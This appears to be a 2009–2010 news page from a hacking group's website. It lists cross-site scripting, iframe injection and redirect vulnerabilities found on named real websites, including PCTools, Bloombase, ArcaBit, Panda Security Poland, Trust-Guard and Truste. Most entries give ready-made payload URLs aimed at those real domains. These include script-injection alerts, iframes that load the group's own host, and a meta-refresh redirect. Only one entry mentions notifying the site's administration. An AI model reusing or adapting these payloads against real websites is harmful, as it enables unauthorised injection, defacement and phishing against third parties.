Nemesis Our Projects Forums Extra Controls
  RegMe

News


PCTools.com - XSS & IFrame Injection

Vulnerable page is http://www.pctools.com/lostcode/

PoC:

XSS - http://img6.imageshack.us/img6/4808/beztytuubul.jpg

IFrame Injection - http://img517.imageshack.us/img517/8587/beztytuu2q.jpg

Submitted on 2010-02-27 by [-TE-]-Neo (0 comments)

Bloombase - XSS & IFrame Injection

Vulnerable page is: http://www.bloombase.com/download/search.jsp

PoC:

XSS -
Code:
"><script>alert(String.fromCharCode(88,83,83))</script>


http://img12.imageshack.us/img12/4602/33995996.jpg

IFrame Injection -
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img27.imageshack.us/img27/7669/85332927.jpg

Submitted on 2009-09-01 by [-TE-]-Neo (0 comments)

ArcaBit - XSS

PoC:

XSS -
Code:
http://www.arcabit.pl/content/view/531/123/lang,english/%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E


http://img6.imageshack.us/img6/2445/12367325.jpg

IFrame Injection -
Code:
http://arcabit.pl/faq/search/?q=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fnemesis.te-home.net%3E%3C%2Fiframe%3E&s=OK


http://img8.imageshack.us/img8/3421/45031884.jpg

The administration has of course been notified about the problem.

Submitted on 2009-08-11 by [-TE-]-Neo (0 comments)

Panda Security Poland - XSS & IFrame Injection

PoC:

XSS -
Code:
http://www.pspolska.pl/onas/prasa/article.php?id=604&rok=2009%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E


http://img354.imageshack.us/img354/7860/83377031.jpg

IFrame Injection -
Code:
http://www.pspolska.pl/onas/prasa/article.php?id=604&rok=2009%22%3E%3Ciframe%20src=http://nemesis.te-home.net%3E%3C/iframe%3E


http://img190.imageshack.us/img190/3170/72988111.jpg

Submitted on 2009-07-31 by [-TE-]-Neo (0 comments)

Hacker-safe vs Trust-Guard vs Truste

Hacker-safe vs Trust-Guard vs Truste
  
Multiple HTML Injection Vulnerability

hackersafe.com.tr

vulnerable page:

Code:
http://www.hackersafe.com.tr/merchants/moreinfo.htm
  
Code:
http://hackersafe.com.tr/mail.php

Code:
http://hackersafe.com.tr/mail2.php


http://img145.imageshack.us/img145/1280/89767110.jpg


Trust-Guard - XSS,Redirect and Iframe injecxtion

Code:
http://blog.trust-guard.com/?s="><script>alert(String.fromCharCode(88,83,83))</script>

Code:
http://blog.trust-guard.com/?s=">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""



http://img407.imageshack.us/img407/1584/36759027.jpg
http://img407.imageshack.us/img407/9493/22598724.jpg

Code:
https://secure.trust-guard.com/ResetPassword.php
  

The same bug on login module !

http://img29.imageshack.us/img29/3552/61673649.gif

http://img29.imageshack.us/img29/7527/50370154.gif


Truste.org - XSS & Iframe injection

Code:
http://blog.truste.org/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>


Code:
http://blog.truste.org/index.php?s="><iframe src=http://nemesis.te-home.net></iframe>


Vulnerable page on truste.org

Code:
http://www.truste.org/forms/learn_more.php


http://img366.imageshack.us/img366/8851/90848824.gif

http://img366.imageshack.us/img366/4775/15714262.gif  

How someone can sell Security Certificate when his security are 0 ?

Submitted on 2009-06-22 by [-TE-]-Methodman (0 comments)



Older